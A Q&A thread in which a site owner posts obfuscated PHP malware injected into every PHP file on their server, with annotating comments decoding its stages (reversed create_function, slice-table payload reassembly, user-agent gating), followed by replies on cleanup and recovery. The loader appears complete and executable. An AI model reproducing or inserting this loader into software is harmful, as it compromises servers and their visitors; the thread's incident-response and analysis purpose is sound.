
My server is infected with an XSS attack. All of the PHP files (all of WordPress, my custom .php scripts and applications) have been injected with a similar type of encrypted code, shown below.

What is the course of action in a situation like this? I've read about preventing XSS but couldn't find a solid guide on what to do when you have already been attacked.

Also, I wonder whether it is possible to decrypt the injected PHP code below:

<?php /* Injected loader: one obfuscated string ($wwykwjmqa) plus a short decoder that rebuilds a payload from (offset, length) slices of that same string and executes it through a dynamically created function. The blob is not readable as stored; the comments below mark what each decoder stage does. NOTE(review): fragments visible inside the blob -- strtolower($_SE...RVER[...]) / strstr($uas, ...) user-agent checks, @error_reporting(0), and a one-character shift decoder chr(ord($n)-1) -- suggest the reassembled payload is itself a second-stage decoder gated on the visitor's browser, which would explain why the site can look clean to its owner; this is inferred from fragments, not confirmed by executing it. */ $wwykwjmqa = '281Ld]245]K2]285]Ke]53Ldd/#)rrd/#00;quui#>.%!<***f  x27,*e  x27,*d  x27,*c  x27,*4<%j,,*!|  x24-    x24gvodujpo!    x24-    x24y7   x24-    x24*<7fw6<*K)ftpmdXA6|7**197*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!*#>m%:|:*r%:-t%)3of:opjudo%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]8^#zsfvr# x5cq%)ufttj x22)gj6<^#Y#    x5cq%   x27Y%6<.mif((function_exists("  x6f 1#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)mg%!)!gj!<2,*j%!-#1]#-bu,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r    x5c2^-%hOh/#00#W~!%t2-K)ebfsX   x27u%)7fmjix2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO   x22#)fepmqyfA>2b%!<*qp%d($n)-1);} @error_reporting(0); $effwexo :>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)*#j{hnpd#)tutjyf`opjudovg x22)!gj}56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hn   x7fw6*CW&)7gj6<*doj%7-C)fepmqz+sfwjidsb`bj+upcotn+qsvmt+fmhpph! x24-    x24gps)%j>1<%j=tj{fpg)% x24-    x24*<!~!    x24/%t2w/   x24)##-!#~<)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>>!    x24Ypp3)%cB%iN}#-!  x24/%tmw/   x24)%c*W%eN+#Qi x5c1^W%c!>!%i#  x24#-!#]y38#-!%w:**<")));$dsngrwc d%6<pd%w6Z6<.4`hA x27pd%6<    x24-    x24!>!  x24/%tjw/   x24)%   x24-    x24y4   x24-    x281]265]y72]254]y76#<!%w:!>!(%w:!>!    x246767~6<Cw6<pd%w6Z6<.5`hA x27p!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!os!osvufs}w;*    x7f!>>  x22!pd%)!gj}Z!-id%)uqpuft`msvd},;um!|!*5!   x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-4]y8  x24-    x24]26  x24-    x2b x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%#<%tpz!>!#]D6M7]K3#<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!    
x24/%tmw/   x24)%zW%h>EzH]672]48y]#>s%<#462]47y]252]18y]#>q%<qpuft`msvd}+;!>!}  x27;!>>>!}_;gvc%}&;ftmbg}   x7f;]53]Kc]55Ld]55#*<%bG9}:}.}6*CW&)7gj6<.[A    x27&6<  x7fw6*  x7f_*6<#o]1/20QUUI7jsv%7UFH#    x27rfs%6~6< x]},;osvufs}    x27;mnui}&;zepc}A;~!}   x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]#/% x24-    x24!>!fyqmpef)# x24*<!%t::!y3f]51L3]84]y31M6]y3e]81 x24b!>!%yy)#}#-#    x24-    x24-tusqpt)%z-#:#*!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeob6<*msv%7-MSV,6<*)ujojR    x27id%6<    x7fw6*  x7f_*#ujojRk3`{666~6<&w6<   x7fw5   x52 137 x41 107 x45 116 x54"]); if ((strstr($uas,"  x6d 163 x69 11~!<2p%    x7f!~!<##!>!2p%Z<^2 x5c8M7]381]211M5]67]452]88]5]48]32M3]316e"; function wfvpmkm($n){return chr(or323zbe!-#jt0*?]+^?]_  x5c}X   x24<!%tmw!>!#]#762]67y]562]38y]572]48y]dy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L8M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]23f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&by84]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]25x24-   x24-!%  x24-    x24*!|! x24-    x24 x5c%j^  x24-    x24tvctus)% x24-%yy>#]D6]281L1#/#M5]DgP5]D6#<%f#-bubE{h%)tpqsut>j%!*9!  x27!hmg%)!gj!~<ofmy%,3,j%>j%!<{6~6<tfs%w6<  x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)d:!ftmf!}Z;^nbsbq%  x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utj7f<*X&Z&S{ftmfV   x7f<*XAZASV<*w%)pmqyf   x27*&7-n%)utjm6<    x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**1111276<C  x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%qp%)54l}   x27;%!<*#}_;#)323ldfid>}&;!osvufs}  x7f;!opjudo.uofuopD#)sfebfI{*w%)kVOBALS["   x61 156 x75 156 x6de#)tutjyf`4  x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudovg+)!g28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=%!|!*)323zbek!~!<b%   x7f!<X>b%Z<#opobE{h%)tpqsut>j%!*72! 
x27!hmg%)!gj!<2,*j%-#1]#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxc:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]W%c:>1<%b:>1<!gps)%j#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fj+{e%!osvufs!*!+A!>!{e%)!>>   x22!ftmbg)!gj<*#k#)usbut`cpV    x7f%j:>>1*!%b:>1<!fmtf!%b:>%s:  x5c%j:.2^,%b:<!%c:>%s:  x5c%j:^<!%w`    x5c^>Ew:Qb:Qc:W~!%z!-}!#*<%nfd>%fdy<Cb*[%h!>!= $haczumi("", $effwexo); $dg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ x24<!fwbm)%tjw)bssbz)#P#-%tdz*Wsfuvso!%bss  x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:62    x65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 xpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<72qj%6<^#zsfvr#   x5cqvg<~    x24<!%o:!>! x242178}527}88:}334}472 x24<!%ff2!>!bssbz)  x24]25      x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44e*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37ypd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppvufs!~<3,j%>j%!*3!    x27!h*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&97e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]#/#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc1"]=1; $uas=strtolower($_SE=])0#)U!  
x27{**u%-#jt0}Z;0]=]0#pd%w6Z6<.3`hA x27pd%6<pd%w6Z6<.2`hA   x2-2qj%7-K)udfoopdXA    x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB-*.%)euhA)3of>2bd%!<5h%/#0#/*#npS["  x61 156 x75 156 x61"])))) { $GL#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj  x22)gj!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<j;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:52fyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,45")) or (strstr($uas," x72 166 x3a 61  x31"))) { $haczumi = "  x63 1w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%r%7/7#@#7/7^#iubq#    x5cq%   x27jsv%6<C>^#zsfvr# x5cq%7**)fubfsdXA   x27K6<  x7fw6*3qj%7>    x2272qj%)7gj6<**2qj%)hopm3qjA)qj36* x7f_*#fubfsdXk5`{66~6<&w6<|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`= implode(array_map("wfvpmkm",42   x5f 163 x74 141 x72 164") && (!isset($GLOBALsngrwc();}}vg}k~~9{d%:osvufs:~928>> x22:ftmbg39*x{**#k#)tutjyf`x    x22l:!}V;3q%}U;y]}R;27]445]212]445]43]321]464]284]364]6]234]342]58]24]31#7]y86]267]y74]275]y7:]268]y7f#<!%tww!>!    
x2400~:<57ftbc  x7f!|!*uyfu x27kmsvd}R;*msv%)}.;`UQPMSVDh%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]27]sv`ftsbqA7>q%6<  x7fwppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,2njA    x27&6<.fmjgA    x27doj%6<   x7fw6*  x7f_*#fmjgk4`str_split("%tjw!>!#]y84]275]y83]248]y83]256]yxB%h>#]y31]278]y3e]81mjg}[;ldpt%}K;`ufldpt}X;`7pd%6<C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fe7R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoFhopmA  x273qj%6<*Y%)fnbozcYufhA    x2)2q%l}S;2-u%!-#2#/#%#/#o]#/*) x7f x7f x7f<u%V x27{ftmfV   xRVER[" x48 124 x54 120 x5f 125 x53 10sTrREvxNoiTCnuf_EtaerCxECalPer_Rtszbpugxmqd'; /* Stage 1 -- recover the helper function names. chr(833-713) is 'x' (120); substr(..., 5877, 34) cuts "sTrREvxNoiTCnuf_EtaerCxECalPer_Rts" from the tail of the blob, so $xadaat = ['sTrREv', 'NoiTCnuf_EtaerC', 'ECalPer_Rts']: reversed function names in mixed case (PHP function names are case-insensitive, so the case mix only defeats naive grep). */ $xadaat=explode(chr((833-713)),substr($wwykwjmqa,(40926-35049),(188-154))); /* $xadaat[0] is 'sTrREv' (strrev): strrev('NoiTCnuf_EtaerC') -> create_function, i.e. compile-a-string-into-code */ $ghhrhvx = $xadaat[0]($xadaat[(6-5)]); /* strrev('ECalPer_Rts') -> str_replace */ $ohxwtrqt = $xadaat[0]($xadaat[(11-9)]); /* Stage 2 -- payload reassembly. $xjtystpc is a flat list of (offset, length) pairs, $ukgzlz is the blob, $luupugng is str_replace. Each pair selects one substr() slice of the blob and the slices are concatenated in list order; finally every chr(9) (tab) is replaced with chr(92) (backslash). Presumably the backslashes were stored as tabs so that no "\x.." escape sequences are visible in the literal -- intent inferred. The function_exists guard only prevents a redeclaration fatal error, presumably because the same stub is injected into many files that may include each other -- unverified. */ if (!function_exists('dulwdh')) { function dulwdh($xjtystpc, $ukgzlz,$luupugng) { $bzudlnhrz = NULL; for($gynqittgr=0;$gynqittgr<(sizeof($xjtystpc)/2);$gynqittgr++) { $bzudlnhrz .= substr($ukgzlz, $xjtystpc[($gynqittgr*2)],$xjtystpc[($gynqittgr*2)+(4-3)]); } return $luupugng(chr((55-46)),chr((294-202)),$bzudlnhrz); }; } /* chr(164-120) is ',' (44): the slice table for dulwdh(), alternating offset,length into $wwykwjmqa */ $fjslgcupn = 
explode(chr((164-120)),'333,27,5103,47,4482,35,3015,26,4296,27,5840,37,1993,66,4769,67,3755,52,2126,39,579,41,5073,30,5558,45,1075,67,1002,26,4354,38,5649,49,2818,70,493,21,2888,49,1656,37,126,23,4392,58,4934,63,5750,33,3840,20,4882,52,284,49,5442,20,4997,29,733,30,5511,47,2624,50,4708,61,1924,69,1622,34,3373,49,5624,25,5359,24,1219,21,1548,48,1187,32,4596,62,1142,45,4098,24,404,24,3171,44,2570,54,2743,43,1240,49,862,43,149,54,650,34,2059,31,514,65,4450,32,24,53,1366,61,1864,60,763,33,3215,58,3807,33,4122,63,2354,60,3136,35,4517,43,5026,47,5336,23,2674,69,2937,55,5161,37,684,49,4046,52,3041,57,3422,60,5812,28,2786,32,5462,49,5698,52,2992,23,5198,38,1693,70,4323,31,5783,29,2165,41,2414,63,5288,48,5383,59,3098,38,3988,58,1512,36,2206,25,203,25,3860,67,2477,62,1823,41,1028,47,1342,24,77,49,796,66,1763,36,905,61,3927,61,3273,44,1447,65,428,65,4836,46,5603,21,4658,50,4185,45,1799,24,4230,66,1427,20,2539,31,2231,54,3317,36,0,24,1596,26,3566,25,228,56,2285,69,2090,36,5236,52,3682,44,3726,29,3353,20,620,30,3482,64,3546,20,4560,36,3619,63,1289,53,360,44,966,36,3591,28,5150,11'); /* Stage 3 -- create_function('', <reassembled payload>) compiles the decoded text into an anonymous function. create_function is deprecated since PHP 7.2 and gone in 8.0, so this stub can only execute on older interpreters. */ $cagbthgj = $ghhrhvx("",dulwdh($fjslgcupn,$wwykwjmqa,$ohxwtrqt)); /* Stage 4 -- run the payload */ $ghhrhvx=$wwykwjmqa; $cagbthgj(""); /* Afterwards the loader overwrites its own variables with 121 and 120; presumably housekeeping so the executing scope shows nothing useful -- intent inferred */ $cagbthgj=(638-517); $wwykwjmqa=$cagbthgj-1; ?>

I just want to understand what it does and where it got in.

Thanks in advance for all the help!

    That is not XSS. Your server has been compromised and I would recommend formatting it and not putting the WordPress sites back until you are sure they are up-to-date and all unknown code has been removed. It could have been anything, from SQL injection to leaked FTP credentials. – jeroen Feb 09 '16 at 10:41
    `"What is the course of action in a situation like this?"` Create a backup of the infected site files (for later investigation), then either delete everything (shared hosting - your host can probably do this for you) and restore from a backup, or restore an OS snapshot (vps). Make sure you change all credentials (database, ftp, ssh etc), and update all software. Then you can analyse the infected backup to work out how they got in in the 1st place. – Steve Feb 09 '16 at 10:42
  • You can search for all these hacks (not xss) and remove them. But that would be pointless until you find out how the site was compromised. You can normally decode these hacks if you have the patience – RiggsFolly Feb 09 '16 at 10:43
    Since you cannot distinguish an XSS attack from a system flaw, I think it would be much better if you hire someone who can teach you the basics about security rules for a sysadmin (it is not something you can learn in one day and there are too many checks to do); otherwise the risk is to repeat the same mistakes and make your server/application unsafe again. – gp_sflover Feb 09 '16 at 11:23
  • Thank you all so much for your precious contributions! – putun Feb 11 '16 at 22:16


OK, so I wanted to share an update and close this. Here is what I did to recover from my server injection.

1) Wrote a script which goes through every PHP file and looks for the injected code; if found, it removes it. (The injected code has a similar beginning and ending pattern.)

2) Changed passwords for server logins.

3) Updated very very old wordpress sites in the server.

It seems that this injected code was used for brute-forcing other WordPress sites & cPanels, by the way.
